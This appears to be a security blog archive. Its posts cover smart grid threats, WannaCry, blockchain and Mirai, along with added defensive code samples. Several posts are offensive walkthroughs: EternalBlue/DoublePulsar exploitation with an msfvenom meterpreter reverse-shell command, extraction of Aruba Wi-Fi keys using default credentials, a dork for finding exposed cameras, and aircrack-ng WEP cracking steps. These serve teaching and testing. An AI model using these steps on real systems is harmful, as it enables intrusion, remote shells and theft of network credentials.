Smart Grid – Cyber Security

Today, smart grid is a buzzword used by every IT/OT technology researcher, evangelist and enthusiast. But do we really understand what it is, how it is going to change the existing energy and utilities landscape, what security threats and vulnerabilities it may face, and what skills we as security professionals need to equip ourselves with?

Legacy, analog grid systems are being migrated to advanced, digitally enabled smart electric grid systems to establish a reliable form of communication between the consumer and the service provider. This two-way communication channel helps in meeting exact demand, reducing costs, and enabling constant monitoring and power system availability.

With the introduction of ICT (information and communication technologies) and massive integration between several components into an analog grid environment, the landscape becomes more prone to cyber attacks. The arrangement of critical devices integrated with smart and digital technologies should be assessed for security threats and vulnerabilities in order to deploy sufficient solutions to minimize the impact and risks. An attacker can gain unauthorized access to ill-configured systems to destabilize the grid in unpredictable ways.

Security is the key component; without it the smart grid network cannot function or sustain itself. Grids are critical infrastructure and need to be protected from cyber threats. Due to its exceptionally large landscape of distributed systems, a smart grid offers an equally large attack surface to attackers. Grid security can be jeopardized by a successful attack on a critical element, which can cascade into a whole-system blackout.

Domains in a Grid
———————-
According to NIST, the smart grid is composed of 7 domains that are interconnected to improve the way information flows between these components, which also enhances the business and technical processes involved. These elements are integrated to operate with each other to benefit both the service provider and the consumer of the service.

 

The advantages of migrating from a conventional grid to a modern, smart grid do not end at integration of components, renewable energy and power consumption management. It also improves the reliability of electricity service, automates fault detection, advances safety measures and reduces environmental impact, and this is achievable through a user-centric approach.

Vulnerabilities in Smart Grid
————————————

An attacker with expertise in exploiting vulnerabilities in IT networks can also jeopardize the security of a smart grid, because the system and network components are similar. Attacks on critical sectors fall mainly into three categories: component, protocol and topology.

  • Vulnerabilities in any field component such as an RTU (remote terminal unit, used in the energy sector to remotely command and manage grid devices). These remotely managed components are subject to attack because they lack security at the design level.
  • Protocols (Modbus, DNP3) used in the critical sectors are vulnerable to various cyber threats such as MitM, sniffing attacks, buffer overflows, issuance of faulty states, false data injection, etc.
  • Denial of service attacks can also be launched against the grid devices to prevent supervisors from managing the devices.
  • A malicious user can spread malware in the environment through the use of removable devices to infect smart grid devices.
  • Replay attacks can be conducted, where an attacker is able to send false information such as tampered meter data, fake alerts, wrong controller values, etc.
  • Passive traffic analysis would be possible, where an attacker is able to capture and analyse network traffic to decipher critical data, if not encrypted.
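
An added example, not part of the original article: one way a utility head-end can reject the replayed or tampered meter messages listed above, by checking an HMAC over each reading and enforcing a strictly increasing per-meter counter. The key, meter ID, message layout and function names are assumptions made for illustration.

```python
import hashlib
import hmac
import struct

# Constructed demo key; a real meter would hold a unique key in protected storage.
METER_KEYS = {b"MTR-0001": b"constructed-demo-key-0001"}

BODY_FMT = ">8sQQ"   # meter id (8 bytes), message counter, reading in watt-hours
TAG_LEN = 32         # HMAC-SHA256 output size


def seal_reading(meter_id: bytes, counter: int, watt_hours: int) -> bytes:
    """Meter side: pack id, counter and reading, then append an HMAC tag."""
    body = struct.pack(BODY_FMT, meter_id, counter, watt_hours)
    tag = hmac.new(METER_KEYS[meter_id], body, hashlib.sha256).digest()
    return body + tag


class HeadEnd:
    """Utility side: verifies the tag and enforces a strictly increasing counter."""

    def __init__(self):
        self.last_counter = {}  # meter_id -> highest counter accepted so far

    def accept(self, message: bytes):
        if len(message) != struct.calcsize(BODY_FMT) + TAG_LEN:
            return (False, "malformed")
        body, tag = message[:-TAG_LEN], message[-TAG_LEN:]
        meter_id, counter, watt_hours = struct.unpack(BODY_FMT, body)
        key = METER_KEYS.get(meter_id)
        if key is None:
            return (False, "unknown meter")
        expected = hmac.new(key, body, hashlib.sha256).digest()
        # Constant-time comparison: any change to id, counter or reading fails here.
        if not hmac.compare_digest(tag, expected):
            return (False, "bad tag")
        # A captured message carries an old counter, so resending it is rejected.
        if counter <= self.last_counter.get(meter_id, -1):
            return (False, "replay")
        self.last_counter[meter_id] = counter
        return (True, watt_hours)


if __name__ == "__main__":
    head_end = HeadEnd()
    msg = seal_reading(b"MTR-0001", 1, 1500)
    print(head_end.accept(msg))   # first delivery is accepted
    print(head_end.accept(msg))   # the same bytes sent again are refused
```

The tag gives integrity and freshness only; the reading itself still travels in clear text, so the passive traffic analysis item above needs encryption on top.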

The attack surface is already quite exposed and vulnerable in the current grid environment because of the legacy systems still in use. Introducing smart and digital devices into the conventional grid infrastructure is going to increase that attack surface, which needs to be addressed by the energy and utilities companies, along with the vendors developing smart devices, from the design level.

A smart grid infrastructure is composed of hundreds of different devices working together to maintain a consistent communication channel between them. A grid environment and its related infrastructure can be segregated into two components: systems and network.

  • Systems – Smart meter, operation center, renewable energy resources, smart household appliances
  • Network – HAN (home area network) and WAN (wide area network)

A smart meter is an embedded device with volatile and non-volatile memory, configured with wireless communication protocols and hardware to send meter readings to your service provider in order to generate accurate bills and for power consumption management. The smart meter acts as a gateway for the in-house smart devices and service providers to collect or feed in the needed information.

The flow of information between the smart in-house appliances and the service provider can be achieved through various communication technologies already implemented and widely used in IT environments (HAN: Zigbee, wired or wireless Ethernet and Bluetooth) (WAN: 3G, LTE, WiMax, GSM, fibre optics). This way a two-way communication channel can be established between the consumer and the service provider to send sub-hourly power usage from smart meters and data for constant monitoring to identify any abnormalities. The collection of information, sending of instructions and generation of reports are generally handled by a centralized electric utility center.

A HAN (home area network) is a small network composed of household appliances communicating with smart meters to facilitate efficient power consumption management. HANs are used in residential areas; similarly, BANs (business area networks) and IANs (industrial area networks) are used in their respective areas.

A WAN (wide area network), by contrast, is a bigger network that interconnects the HANs, BANs, IANs, smart meters and the utility company.

Scenario to understand the difference:
————————————————
Let’s take a simple scenario to understand the advantages.

Conventional grid: The customer buys a new electrical appliance, plugs it in and starts operating it. Installation and operation seem easy, but the customer will never know how much power the new appliance is consuming (unless it is measured and monitored manually), and the service provider will not be able to optimize and meet the exact power demand.

Smart grid: The customer buys a new electrical appliance, plugs it in, registers the device with the service provider over a toll-free call or through a web portal, and starts operating it. There are a few more steps involved before the appliance can be used, but the customer and the service provider will now be able to close gaps around demand management, critical usage information, accurate billing, smart power consumption, etc.

The picture below depicts the changes between the conventional and the smart grid.

Smart Grid Benefits
————————

  • Utilities : Larger portfolio of energy resources (renewable/non-renewable), increased grid efficiency and reliability, fewer blackouts and outages, automated fault detection and reduction in human error.
  • Consumer: Increased transparency with energy consumption and billing information, energy cost reduction by detailed pricing during peak hours, fewer billing errors and diversified payment methods.
  • Government: Adherence to international standards, minimized dependency on non-renewable sources by way of alternative renewable sources of energy, and advanced critical and national infrastructure supporting the country's mission and vision.

Conclusion
————–

Smart grid is basically an integration between the energy and IT layers, which requires seamless integration of elements like transmission and distribution sources, renewable energy sources, communication systems, etc.

Security should be the prime focus from the very beginning of designing a smart grid, as IT and OT environments share similar cyber threats because both work on IP-based networks. Because integration is being performed on such a large scale, managing cyber security and cloud computing applications becomes a big challenge, as the attack surface also increases.

References:
NIST, clp.com.hk, ResearchGate, Internet


Exploiting Windows 7 & 2008 with EternalBlue and DoublePulsar

A few weeks back, ShadowBrokers and Equation Group, two hacking groups, managed to leak NSA’s version of the hacking tool “Fuzz Bunch”, which can be maliciously used to hack any Windows 7 and Server 2008 R2 (x64) system, all service packs, without needing authentication.

The FuzzBunch toolkit comes with a pre-cooked exploit, EternalBlue, that exploits a Windows SMB vulnerability, and a plugin, DoublePulsar. For your information, the same exploit code was taken advantage of to create the WannaCry ransomware, which was successful in creating a big impact on computer networks all around the world.

With all that happened in the past, I decided to document the step by step approach of hacking a Windows 7 machine with FuzzBunch Toolkit.  So let’s get started.

Note: This tutorial is just for informational and educational purposes, the author will not be responsible for any illegal hacking attempts against individuals or a production network made by any individual or a group.

Environment:


  • Windows 7 : 10.21.1.118 : Attacking Machine installed with Fuzz Bunch (installation of fuzzbunch has few dependencies like python-2.6, pywin32-212)
  • Kali: 10.21.1.119: Second attacking machine that will be used for creating malicious dll and for gaining access
  • Windows 7: 10.21.1.124 : Victim
  1. Once you have the setup ready, execute “python fb.py” on windows attacking machine to initialize fuzzbunch toolkit.
  2. Next configure the victim IP,  fall back IP, redirection, project name and log directory (attacking Windows 7).
  3. The first step in exploitation is to select the EternalBlue exploit so we can execute the FuzzBunch. On the cmd prompt type “use EternalBlue” and press enter to configure the options available, such as target IP, port, target os, etc.
  4. Once you are done it will ask you to execute EternalBlue, you can press enter to execute on the target.
  5. As you can see, the target is successfully exploited and we should see the message “Eternalblue Succeeded”.
  6. Now it’s time to gain access to the machine using the backdoor installed. For this purpose we will use “msfvenom”, available in Kali, to create a malicious dll and inject it through the “DoublePulsar” plugin.
  7. Execute the below msfvenom command to create a malicious dll. “msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<kali machine IP> LPORT=<any non-standard port> -f dll -o <filename.dll>”
  8. Copy the dll to windows attacking machine to be able to inject while using DoublePulsar plugin.
  9. Launch plugin by typing “use Doublepulsar” and configure target ip, port, protocol, target os architecture, malicious dll to be injected, etc.
  10. Before you execute the plugin open metasploit and use “exploit/multi/handler” with the same payload used while creating the dll and start listening.
  11. Now you are good to launch the “DoublePulsar” exploit, if all goes well you will successfully exploit the target to gain access.

Follow similar steps to replicate the scenario in your test labs. Feel free to contact me if you have any queries. charit0819[at]gmail[dot]com

PS: Metasploit has also developed modules for the detection and exploitation of the vulnerability.

WannaCry – A Simple Perspective

Till now, more than 100 countries (UK, US, Russia, China, etc.) have been severely impacted by a professionally crafted piece of ransomware called “WannaCry” / “WannaCrypt”. The attack came into the limelight when the British National Health Service was targeted; its IT systems and patient information privacy were invaded and brought to their knees. The worm has already caused damage worth millions and is still likely to spread. A group named @0xSpamTech has claimed responsibility. The worm encrypts files using AES and RSA encryption, which can only be decrypted using a unique key.

As per wiki “Ransomware is a type of malicious software that carries out the cryptoviral extortion attack from cryptovirology that blocks access to data until a ransom is paid and displays a message requesting payment to unlock it”

But this worm/ransomware operates differently from the standard definition. The worm includes a component (payload) that searches for vulnerable systems on the network to infect them as well. Due to its unconventional behaviour, the worm is able to continue infecting millions of Windows-based machines all over the globe. The world of security has not witnessed a worm of this kind in the last 2 years.

The WannaCry worm uses a publicly known exploit (MS17-010), which is triggered by sending a specially crafted packet to an SMBv1 server. The vulnerability has now been fixed by Microsoft, but millions of organizations have yet to completely patch their IT infrastructure.

Microsoft has already released a set of patches that need to be installed in every production environment to prevent and block the worm from spreading to and infecting others. Follow the link to read more.

List of Windows versions affected by this worm:
1. Windows XP
2. Microsoft Windows Vista SP2
3. Windows 7
4. Windows 8.1
5. Windows RT 8.1
6. Windows Server 2008 SP2 and R2 SP1
7. Windows Server 2012 and R2

Two methods of infection are being observed, which the worm uses to infect vulnerable machines:
– Social engineering, where the end user is persuaded/tricked into clicking on a link.
– Unpatched machines running a vulnerable version of the SMB (v1) protocol.

After the target PC is infected, the user is presented with a message asking them to deposit $300-$600 in the form of bitcoins to decrypt and unlock their files.

If you are interested in tracking the payments made to the hackers’ accounts, please follow the link; you can track payments to their Bitcoin addresses listed below:
– 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
– 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
– 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

How can you protect yourself
1. Get the latest patches available from Microsoft and deploy them
2. Disable SMBv1 completely
3. Add firewall rules on the perimeter firewall to block any incoming connection for port 445
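
An added example, not part of the original post: a small audit for item 3 that walks `iptables -S` style rules in order and reports whether inbound TCP/445 from the WAN side is actually blocked, since an earlier broad ACCEPT can shadow a later DROP. The rule sets are constructed, `eth0` as the WAN interface is an assumption, and only the handful of match options shown is understood.

```python
import shlex

# Constructed `iptables -S` style rule sets; eth0 is assumed to be the WAN side.
WEAK = """
-P FORWARD DROP
-A FORWARD -i eth0 -p tcp -m multiport --dports 80,443 -j ACCEPT
-A FORWARD -i eth0 -p tcp --dport 1:1024 -j ACCEPT
-A FORWARD -i eth0 -p tcp --dport 445 -j DROP
"""
FIXED = """
-P FORWARD DROP
-A FORWARD -i eth0 -p tcp --dport 445 -j DROP
-A FORWARD -i eth0 -p tcp -m multiport --dports 80,443 -j ACCEPT
"""


def covers(spec, port):
    """True if a port spec such as '445', '1:1024' or '139,445' includes port."""
    for part in spec.split(","):
        lo, sep, hi = part.partition(":")
        low = int(lo) if lo else 0
        high = int(hi) if hi else (65535 if sep else low)
        if low <= port <= high:
            return True
    return False


def parse_rules(text):
    """Return (chain policies, ordered rules) for the subset of options handled."""
    policies, rules = {}, []
    for line in text.splitlines():
        tok = shlex.split(line, comments=True)
        if not tok:
            continue
        if tok[0] == "-P":
            policies[tok[1]] = tok[2]
        elif tok[0] == "-A":
            rule = {"chain": tok[1], "proto": None, "in_if": None, "ports": None,
                    "target": None, "partial": False, "raw": line.strip()}
            i = 2
            while i < len(tok):
                opt = tok[i]
                if opt == "!":              # negated match: not modelled here
                    rule["partial"] = True
                    i += 1
                    continue
                arg = tok[i + 1] if i + 1 < len(tok) else ""
                if opt in ("-p", "--protocol"):
                    rule["proto"] = arg
                elif opt in ("-i", "--in-interface"):
                    rule["in_if"] = arg
                elif opt in ("--dport", "--dports"):
                    rule["ports"] = arg
                elif opt in ("-j", "--jump"):
                    rule["target"] = arg
                elif opt not in ("-m", "--comment"):
                    rule["partial"] = True  # extra match (e.g. -s): covers only some traffic
                i += 2
            rules.append(rule)
    return policies, rules


def verdict_445(text, chain="FORWARD", wan_if="eth0", port=445):
    """First-match evaluation for an inbound TCP packet to `port` on `wan_if`."""
    policies, rules = parse_rules(text)
    for r in rules:
        if r["chain"] != chain or r["proto"] not in (None, "tcp", "all"):
            continue
        if r["in_if"] not in (None, wan_if):
            continue
        if r["ports"] is not None and not covers(r["ports"], port):
            continue
        # Conservative: a partial DROP is not trusted, a partial ACCEPT is reported.
        if r["target"] in ("DROP", "REJECT") and not r["partial"]:
            return ("blocked", r["raw"])
        if r["target"] == "ACCEPT":
            return ("exposed", r["raw"])
    default = policies.get(chain, "ACCEPT")
    return ("blocked" if default == "DROP" else "exposed", f"-P {chain} {default}")


if __name__ == "__main__":
    print(verdict_445(WEAK))    # the 1:1024 ACCEPT wins before the DROP is reached
    print(verdict_445(FIXED))
```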

Extracting Wi-Fi Passwords from Aruba Virtual Controller

As usual, I was conducting a pentest and found an interesting way to extract the passwords for multiple access points managed using Aruba Virtual Controller IAP 105.

What is a Virtual Controller ?

Aruba Instant virtual controller gives you the flexibility of configuring multiple access points from a centralized location.
You can distribute, store and regulate configuration for distributed access points from one place. The virtual controller is basically a single point of management for your configuration and firmware.
Firmware versions prior to IAP-105 are vulnerable to an access point password disclosure vulnerability; any malicious user with access to the management console can extract sensitive details using just a browser (Chrome, Firefox, IE, etc.) debugger.
You can extract the passwords using the simple steps below:
1. Login to Aruba virtual controller (in my case it was default admin-admin).
2. Click on the network you want to disclose wireless key for.
3. Click edit Factory Settings >> Go to Security Settings
4. Open browser’s debugger.
5. For the password text box change type to “text” in html.
6. Voila !!
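
The steps above work because the stored key is sent to the browser inside the password field, where masking is only cosmetic. As an added example (not from the original post and not Aruba's code), this check flags password inputs that arrive pre-filled with a real value; the sample markup and field names are constructed.

```python
from html.parser import HTMLParser

# Characters commonly used as a server-side placeholder mask.
MASK_CHARS = set("*\u2022\u25cf")

# Constructed management-page fragments, not the controller's real markup.
SAMPLE_LEAKY = """<form>
<input type="text" name="ssid" value="Corp-WiFi">
<input type="password" name="passphrase" value="constructed-psk-123">
</form>"""
SAMPLE_SAFE = """<form>
<input type="password" name="passphrase" value="********">
<input type="password" name="new_passphrase" value="">
</form>"""


class PasswordFieldAudit(HTMLParser):
    """Collects password inputs whose value attribute carries a real secret."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attr = {name: (value or "") for name, value in attrs}
        if attr.get("type", "").lower() != "password":
            return
        value = attr.get("value", "")
        # Empty values and pure mask strings do not disclose anything.
        if not value or set(value) <= MASK_CHARS:
            return
        # Report the field and the length only; never echo the secret itself.
        self.findings.append({"field": attr.get("name", "?"),
                              "secret_length": len(value)})


def audit_html(html):
    """Return one finding per pre-filled password field in the response body."""
    parser = PasswordFieldAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    print(audit_html(SAMPLE_LEAKY))
    print(audit_html(SAMPLE_SAFE))
```

Run it against saved responses from your own management interfaces; the fix on the server side is to never render the stored secret and to accept a new value only.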

Blockchain : The Future of Digital Payment


  1. What is Blockchain?

Today we rely completely on middlemen such as banks, service providers and credit card companies for our day-to-day services. Blockchain is a vast, global distributed system that acts as the middleman; it runs on systems around the world and is open to everybody. Trust is established not by a middleman but by mass collaboration, clever code and, of course, cryptography, and that’s what this amazing technology is.

Usually, when working with digital content, you send a copy and retain the original yourself. But when it comes to things of value like money, stocks, bonds and financial assets, sending a copy is not a good idea. For example, if I am sending you 100 dollars as payment for something, it becomes really important that you have those 100 dollars and I don’t, because if I can share the same 100 dollars among other transactions then the 100 dollars become worthless.

  2. How Blockchain works

Using Blockchain, buyers and sellers can transfer value directly to each other over the internet in the most secure way possible without the need for a third party. Blockchain is a distributed ledger maintained on multiple systems across the globe and not owned by any specific party; the database of transactions is secured with clever code and strong cryptography, making it hacker proof. Blockchain will do for business what the internet did for communication.

Simple Real Life Example : A journey of diamonds from mines to consumer hands covers a complex path of legal, regulatory, financial manufacturing and commercial practices. Current supply chain for diamonds has to rely on intermediaries on every step of the way from government officials, dealers and banks which adds time and cost. Smuggling and frauds in diamonds trading can hamper governments in collecting fair export taxes and as a result consumers will face the cost of counterfeit products or unethically mined stones.

This is where Blockchain can come into the picture to rescue us; it has the capability to eliminate these vulnerabilities with distributed, secure and transparent transactions. Blockchain provides all parties involved with a synchronized network of transactions; it records every sequence of transactions from beginning to end, whether it is 100 steps in procuring goods or just a single direct transaction. Each transaction that occurs is put into a block and each block is connected with the one before and after it; groups of transactions are attached together and the fingerprint of each is added to the next, thus creating an irreversible chain.

Blockchain is capable of tracking goods from the raw materials to the finished product in the consumer’s hands with embedded security and transparency. Blockchain is distributed, permissioned and secure, which makes it more reliable than the traditional payment systems currently used globally.

Blockchain ledgers are distributed across the network, which ensures that no one person or organization can edit the transaction records. All parties involved in the trade of goods, from raw to finished products, own a copy of every single transaction, and no transaction can be added to the Blockchain without consensus across the parties involved. This means no single entity or company can add or alter transactions without it being permanently recorded, which makes it highly secure and eliminates the risk of fraud.
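
An added example, not part of the original article: a minimal hash chain over the diamond scenario that shows how the "fingerprint added to the next block" exposes an edit, and why the copies held by other parties matter when someone rewrites a whole chain. The block layout, function names and transactions are constructed for illustration; no consensus protocol is implemented.

```python
import copy
import hashlib
import json

GENESIS_PREV = "0" * 64

# Constructed diamond supply-chain transactions, one list per block.
BATCHES = [
    [{"stone": "D-001", "from": "mine", "to": "exporter", "carats": 2.1}],
    [{"stone": "D-001", "from": "exporter", "to": "cutter", "carats": 2.1}],
    [{"stone": "D-001", "from": "cutter", "to": "retailer", "carats": 1.4}],
]


def block_hash(index, prev_hash, transactions):
    """Fingerprint of a block: covers its contents and the previous fingerprint."""
    payload = json.dumps({"index": index, "prev": prev_hash, "tx": transactions},
                         sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()


def build_chain(batches):
    chain, prev = [], GENESIS_PREV
    for index, txs in enumerate(batches):
        digest = block_hash(index, prev, txs)
        chain.append({"index": index, "prev": prev, "tx": txs, "hash": digest})
        prev = digest
    return chain


def first_invalid_block(chain):
    """Index of the first block whose hash or back-link is wrong, else None."""
    prev = GENESIS_PREV
    for block in chain:
        recomputed = block_hash(block["index"], block["prev"], block["tx"])
        if block["prev"] != prev or recomputed != block["hash"]:
            return block["index"]
        prev = block["hash"]
    return None


def tamper_demo():
    honest = build_chain(BATCHES)

    # 1) Edit a recorded transaction and leave everything else alone.
    edited = copy.deepcopy(honest)
    edited[1]["tx"][0]["carats"] = 3.0
    silent_edit = first_invalid_block(edited)

    # 2) Also recompute that block's own hash: the next block's link now breaks.
    edited[1]["hash"] = block_hash(1, edited[1]["prev"], edited[1]["tx"])
    rehashed_block = first_invalid_block(edited)

    # 3) Rebuild the whole chain from forged data: it is self-consistent, but its
    #    final hash no longer matches the copies the other parties hold.
    forged_batches = copy.deepcopy(BATCHES)
    forged_batches[1][0]["carats"] = 3.0
    forged = build_chain(forged_batches)

    return {
        "honest": first_invalid_block(honest),
        "silent_edit": silent_edit,
        "rehashed_block": rehashed_block,
        "full_rewrite_valid": first_invalid_block(forged) is None,
        "full_rewrite_matches_peers": forged[-1]["hash"] == honest[-1]["hash"],
    }


if __name__ == "__main__":
    print(tamper_demo())
```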

  3. How to use and utilize Blockchain as an individual

A) Set up your Blockchain wallet (https://blockchain.info/)

B) Get some bitcoins (https://bitcoin.com)

C) Find merchants who accept bitcoins and start trading

D) If you want to receive bitcoins you need to share the code generated by your wallet

  4. Blockchain Benefits and Challenges

Benefits

  • It enables the exchange of value without a third party being involved
  • Wallet owners have full control over the information and resources
  • The data in Blockchain is consistent and secure
  • Due to its decentralized nature the technology is not prone to a central point of failure
  • Any changes made to the transactional records are publicly viewable
  • Helps in lowering transaction costs

Challenges

  • The underlying infrastructure needs to be reliable and robust to support faster transactions
  • Blockchain technology has to be accepted by the government regulations for its widespread adoption
  • Relatively higher energy is being consumed in validating Blockchain transactions
  • High initial capital is required for large business environments
  • A few privacy and security concerns still need to be addressed to gain trust from the general public

Mapping Mirai Botnet

A malicious botnet built from the Mirai malware has disrupted internet traffic to popular websites like Twitter, GitHub, PayPal, etc. in the United States. According to popular network security companies, the botnet was specially crafted to attack internet-connected cameras and DVRs. The Chinese company “Hangzhou Xiongmai Technology” (a network camera manufacturer) has admitted that its devices were behind Friday’s DDoS attack and it is recalling 3.8 million affected devices to fix them. DNS service provider Dyn has also confirmed that it observed millions of discrete IP addresses associated with the Mirai botnet. Most of the service providers affected by the botnet were able to recover easily from the attack, but botnets like these can attack again in the near future. Last month the same botnet took Brian Krebs’s website down by delivering 665 Gbps of traffic.

How the botnet works: The botnet is designed to brute-force the telnet service on internet-connected cameras installed with Dahua firmware or a generic management interface called “NETSurveillance”, using 62 different combinations of usernames and passwords (admin:admin, admin:12345, etc.). Once the botnet is able to log in to a camera successfully, services like telnet, SSH and HTTP are blocked and the device is seeded with a malicious program that turns it into an enslaved bot. These bots then report to the command and control centre, from where DDoS attacks can be launched to make websites unresponsive. These attacks would have been avoided if the camera login panels or the real-time streaming protocol service had been restricted from remote access.
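
An added example, not part of the original post: detection logic for the behaviour described above, run over constructed telnet authentication logs. It flags a source that piles up failed logins against one device inside a short window, and separately flags a success that follows such a burst, which marks the device as likely compromised. The log format, thresholds and addresses (documentation ranges) are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines: timestamp, source, target device, port, user, result.
SAMPLE_LOG = """\
2016-10-21T11:10:01 src=203.0.113.7 dst=192.0.2.10 port=23 user=admin result=fail
2016-10-21T11:10:02 src=203.0.113.7 dst=192.0.2.10 port=23 user=admin result=fail
2016-10-21T11:10:03 src=203.0.113.7 dst=192.0.2.10 port=23 user=admin result=fail
2016-10-21T11:10:04 src=203.0.113.7 dst=192.0.2.10 port=23 user=admin result=fail
2016-10-21T11:10:05 src=203.0.113.7 dst=192.0.2.10 port=23 user=admin result=fail
2016-10-21T11:10:06 src=203.0.113.7 dst=192.0.2.10 port=23 user=admin result=ok
2016-10-21T11:12:00 src=198.51.100.20 dst=192.0.2.11 port=23 user=operator result=fail
2016-10-21T11:12:20 src=198.51.100.20 dst=192.0.2.11 port=23 user=operator result=fail
2016-10-21T11:12:40 src=198.51.100.20 dst=192.0.2.11 port=23 user=operator result=ok
"""


def parse(line):
    """Split one log line into a dict with a parsed timestamp."""
    stamp, *fields = line.split()
    record = dict(field.split("=", 1) for field in fields)
    record["ts"] = datetime.fromisoformat(stamp)
    return record


def detect(log_text, max_fails=5, window=timedelta(seconds=60)):
    """Return ordered alerts as (kind, source, device) tuples."""
    recent = defaultdict(deque)  # (src, dst) -> timestamps of recent failures
    alerts = []
    for line in log_text.strip().splitlines():
        rec = parse(line)
        if rec["port"] != "23":          # telnet only in this sketch
            continue
        fails = recent[(rec["src"], rec["dst"])]
        # Slide the window: forget failures older than `window`.
        while fails and rec["ts"] - fails[0] > window:
            fails.popleft()
        if rec["result"] == "fail":
            fails.append(rec["ts"])
            if len(fails) == max_fails:  # alert once when the threshold is reached
                alerts.append(("bruteforce", rec["src"], rec["dst"]))
        elif len(fails) >= max_fails:
            # A login that succeeds right after a burst of failures.
            alerts.append(("compromised", rec["src"], rec["dst"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The second source in the sample mistypes a password twice and then logs in, which stays below the threshold and raises nothing.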

Source code released online: The author behind the Mirai malware has released the code online for research and development purposes, stating “I have earn my share of money and now I want to get out of this business”. Follow the link to download the source code: https://github.com/jgamblin/Mirai-Source-Code.
What to do: The Chinese company has advised its customers to change default passwords, update the firmware of the device and keep the devices disconnected until patched. A few researchers are also arguing about why devices like network cameras need remote access from the internet, and up to a certain level I am also in favor of this response. Companies making IoT devices should force the user to change the default password during initial configuration, and remote access to such sensitive and weak IoT devices should not be enabled.

How you can access unprotected network cameras :
1. Try searching on Google for “inurl:index.shtml” and follow the link with IP address in the url. If lucky enough you will be able to see live view of an internet connected camera live streaming from some other continent.


2. Multiple websites are available on the internet that can be used to look for devices connected to the internet with a specific configuration. Below is the screenshot for your reference where I tried searching for a specific network camera on the internet.
Clicking on any of the options listed above will take you straight to the login panel. I think you can now also realize how easy it can be to attack a specific set of devices connected to the internet.

Conclusion: It’s very probable that we will see such DDoS attacks targeting vulnerable IoT devices in the near future. The manufacturers of these devices should consider a few basic security practices before shipping their products.

WI-FI (WEP) cracking with Aircrack (easy 4 steps)

In my last post I tried exploiting WEP wi-fi networks with wifite. Using wifite was no coincidence, but I was facing a few difficulties that forced me to use something simple and easy. But something kept bothering me inside: why could I not crack the same using aircrack? I desperately wanted to try it out.

So I woke up the next morning and started going through some of the best articles available on the web just to warm up a lil bit, which certainly helped. And here we are with a successfully cracked WEP network.

Follow the below steps to successfully crack WEP based wi-fi networks.

  1. Start your wi-fi interface in monitor mode with the command “airmon-ng start wlan0” (I am using an external wi-fi adapter for more attack surface).
  2. Start listening to nearby access points with “airodump-ng mon0” and choose your target. For me the target will be the same as the old one, “*******250”.
  3. Start listening to a specific WEP network: “airodump-ng -c <channel no> --bssid <access point mac> -w <file name> mon0”.
  4. Once you see that a significant number of IVs have been captured, go ahead and launch aircrack: “aircrack-ng <file name>”.
  5. DONE !! 😀

Note: This tutorial is for educational purposes only. Use the steps at your own risk and attack only an AP which you own; unless and until you have permission from the owner, please do not try this.

In my next post I will share my experience of trying to take this to another level: WPA/WPA2.

Lead Auditor & InfoSec Professional